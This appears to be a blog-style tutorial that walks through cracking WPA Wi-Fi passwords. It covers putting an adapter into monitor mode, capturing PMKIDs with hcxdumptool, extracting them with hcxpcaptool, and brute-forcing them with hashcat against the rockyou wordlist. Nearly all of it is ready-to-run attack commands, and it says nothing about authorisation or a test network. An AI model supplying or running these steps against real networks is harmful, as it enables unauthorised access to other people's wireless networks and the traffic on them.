___ _________________ / _ \/ _/ _/_ __/ _ | / // // /_/ / / / / __ | /____/___/___/ /_/ /_/ |_|
First of all check what adapter you're going to use. Must support 'monitor' mode
Double-check that your wlan adapter is down. (I'm going to reference to wlan0 from now on)
ifconfig wlan0 down
Now stop the following services, they can interfere with the channel switching of hcxdumptool.
service network-manager stop
service wpa_supplicant stop
Put the interface in monitor mode.
airmon-ng start wlan0
Start dumping the packets, and enable status 3 is to also capture EAPOL and PROBEREQUEST/PROBERESPONSE
hcxdumptool -o testing.pcapng -i wlan0mon --enable_status 3
Just wait for a while and keep an eye on the bottom status bar.
Look for the 'pwned' tag. It will tell you approximately how many PMKID's it has captured.
Grab some java while you wait, it won't take long to capture though.
After you've been sniffing the airways for a while, stop the capture by using
Now grab the PMKID's and name the file *.16800, you'll find out why in the following step.
hcxpcaptool -E essids -z testing.16800 testing.pcapng
There are multiple ways to bruteforce or use a dictionary attack, I prefer using hashcat.
It makes great use of my graphic cards.
hashcat -m 16800 testing.16800 -w 4 -a 0 --force --potfile-path=testing.pot -r '/rules/hob064.rule' '/dict/rockyou.txt'
As you can see I use a rule and a dictionary, I'll post another page on why I use certain rulesets and dictionaries and how to get them.
This is the waiting part, the longer the password (min-length=8 for WPA), the more time the bruteforce/dictionary/rainbow etc. attack will take.
The cracked password(s) will be put into the 'testing.pot' file.